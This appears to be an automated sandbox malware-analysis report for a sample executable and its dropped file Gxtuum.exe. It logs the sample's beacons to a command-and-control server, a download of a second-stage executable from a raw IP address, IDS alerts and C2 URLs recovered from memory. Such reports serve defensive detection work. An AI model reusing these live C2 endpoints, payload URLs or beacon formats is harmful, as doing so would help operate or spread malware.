Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Joe Sandbox View	IP Address: 213.209.150.137 213.209.150.137
Source: Joe Sandbox View	IP Address: 107.189.27.66 107.189.27.66

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49690 -> 45.59.120.8:80

Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8
Source: unknown	TCP traffic detected without corresponding DNS query: 45.59.120.8

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe

Code function: 0_2_0007C3B0 InternetCloseHandle,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,Sleep,

0_2_0007C3B0

Source: global traffic

HTTP traffic detected: GET /files/dinnmamunms/cubrodriver.exe HTTP/1.1Host: 45.59.120.8

Source: global traffic	DNS traffic detected: DNS query: cobolrationumelawrtewarms.com
Source: global traffic	DNS traffic detected: DNS query: towerbingobongoboom.com

Source: unknown

HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%E6%EF%EF%E3%F0%ED%ED%E9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.php
Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%E6%EF%EF%E3%F0%ED%ED%E9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpgkwr.xyz
Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.php
Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpB
Source: Gxtuum.exe, 00000001.00000002.3779688440.000000000087E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpO
Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpP?z
Source: Gxtuum.exe, 00000001.00000002.3779688440.000000000087E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpY
Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpZ
Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpc
